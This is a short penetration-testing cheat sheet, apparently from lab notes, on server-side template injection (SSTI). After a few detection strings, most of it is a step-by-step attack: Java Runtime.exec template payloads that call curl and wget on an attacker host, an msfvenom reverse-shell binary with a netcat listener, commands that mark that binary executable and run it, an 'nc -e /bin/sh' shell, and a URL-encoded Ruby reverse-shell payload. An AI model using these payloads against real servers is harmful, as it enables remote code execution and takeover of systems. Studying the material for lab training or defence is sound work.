Server-Side Template Injection - SSTI
Back to Table of Contents
Payload Box - SSTI
Notes from SSTI Labs
Common test-cases:
{7*7}
'
ab
{var} ${var} <%var%> [% var %]
Example attack overview:
- Start local server.
python3 -m http.server 80
- Test functionality of python server remotely using JS and curl.
*{"".getClass().forName("java.lang.Runtime").getRuntime().exec("curl http://ip")}
- Create reverse shell payload and initialize a netcat listener for it.
msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=5010 -f elf > r.elf
nc -lvnp 443
- Perform the SSTI, getting RCE on the server.
*{"".getClass().forName("java.lang.Runtime").getRuntime().exec("wget 10.5.0.2:5003/r.elf")}
*{"".getClass().forName("java.lang.Runtime").getRuntime().exec("chmod 777 ./r.elf")}
*{"".getClass().forName("java.lang.Runtime").getRuntime().exec("./r.elf")}
*{os.system("nc -e /bin/sh ip 5010")}
<%=system("ruby%20-rsocket%20-e%27spawn%28%22sh%22%2C%5B%3Ain%2C%3Aout%2C%3Aerr%5D%3D%3ETCPSocket.new%28%22IP%22%2C5007%29%29%27")%>
Tools:
- sstimap